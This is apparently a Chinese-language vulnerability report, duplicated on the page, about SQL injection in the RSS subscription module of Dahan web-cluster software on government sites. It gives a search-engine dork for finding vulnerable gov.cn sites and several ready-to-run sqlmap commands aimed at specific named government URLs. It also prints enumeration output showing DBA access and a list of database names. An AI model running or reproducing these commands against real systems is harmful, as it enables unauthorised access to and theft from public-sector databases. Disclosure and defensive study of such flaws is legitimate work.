VULHUB ™

### 简要描述： 你猜 ### 详细说明： site:gov.cn module/rss 找到约 1,360,000 条结果 （用时 0.25 秒） 大汉网络网站集群的一个订阅功能dba注射，可衍射出其多款产品数据库 找了谷歌前几页的gov网站，命中率还不错 ### 漏洞证明： ``` site:gov.cn module/rss sqlmap.py -u "http://www.yuanan.gov.cn/module/rss/rssfeed.jsp?colid=23" --random-agent --current-user --current-db --dbms oracle --is dba --dbs --tamper=between sqlmap.py -u "http://www.jblr.gov.cn/module/rss/rssfeed.jsp?colid=13247" --random-agent --current-user --current-db --dbms oracle --is dba --dbs --tamper=between sqlmap.py -u "http://www.sxyc.gov.cn/module/rss/rssfeed.jsp?colid=70" --random-agent --current-user --current-db --dbms oracle --is dba --dbs --tamper=between sqlmap.py -u "http://jb.ningbo.gov.cn/module/rss/rssfeed.jsp?colid=6094" --random-agent --current-user --current-db --dbms oracle --is dba --dbs --tamper=between --tables -D "JCMS" ``` [<img src="https://images.seebug.org/upload/201405/231512212b72d92ecdc6ca0643728816e820605d.png" alt="1.png" width="600"...

### 简要描述： 你猜 ### 详细说明： site:gov.cn module/rss 找到约 1,360,000 条结果 （用时 0.25 秒） 大汉网络网站集群的一个订阅功能dba注射，可衍射出其多款产品数据库 找了谷歌前几页的gov网站，命中率还不错 ### 漏洞证明： ``` site:gov.cn module/rss sqlmap.py -u "http://www.yuanan.gov.cn/module/rss/rssfeed.jsp?colid=23" --random-agent --current-user --current-db --dbms oracle --is dba --dbs --tamper=between sqlmap.py -u "http://www.jblr.gov.cn/module/rss/rssfeed.jsp?colid=13247" --random-agent --current-user --current-db --dbms oracle --is dba --dbs --tamper=between sqlmap.py -u "http://www.sxyc.gov.cn/module/rss/rssfeed.jsp?colid=70" --random-agent --current-user --current-db --dbms oracle --is dba --dbs --tamper=between sqlmap.py -u "http://jb.ningbo.gov.cn/module/rss/rssfeed.jsp?colid=6094" --random-agent --current-user --current-db --dbms oracle --is dba --dbs --tamper=between --tables -D "JCMS" ``` [<img src="https://images.seebug.org/upload/201405/231512212b72d92ecdc6ca0643728816e820605d.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/231512212b72d92ecdc6ca0643728816e820605d.png) [<img src="https://images.seebug.org/upload/201405/23151234eee3ccd5acdb4339844d6a40a355d1da.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/23151234eee3ccd5acdb4339844d6a40a355d1da.png) [<img src="https://images.seebug.org/upload/201405/23151246052d519d4dccc74d3e32c54960b77fe0.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/23151246052d519d4dccc74d3e32c54960b77fe0.png) [<img src="https://images.seebug.org/upload/201405/23151258560a050edadb596b94a8b47eddbb0cf2.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/23151258560a050edadb596b94a8b47eddbb0cf2.png) 一式的DBA权限 ``` available databases [29]: [*] CTXSYS [*] DBSNMP [*] DBXX [*] DMSYS [*] EXFSYS [*] JBLDAP21 [*] JBXXGK [*] JCMS [*] JGET [*] JIEP [*] LM [*] LM3 [*] MAILBOOK [*] MDSYS [*] OLAPSYS [*] OPVSTAT [*] ORDSYS [*] OUTLN [*] PROJECT [*] SCOTT [*] SMSBOOK [*] SMSBOOK2 [*] SYS [*] SYSMAN [*] SYSTEM [*] TSMSYS [*] VIPCHAT1 [*] WMSYS [*] XDB ``` 其中可有看到网站群集成的大汉的其他产品 jcms大汉版通JCMS内容管理 LM大汉在线访谈系统 JGET大汉JGET信息采集系统 JIEP不知道中文名-0- VIPCHAT大汉在线访谈系统 JBXXGK大汉政府信息公开平台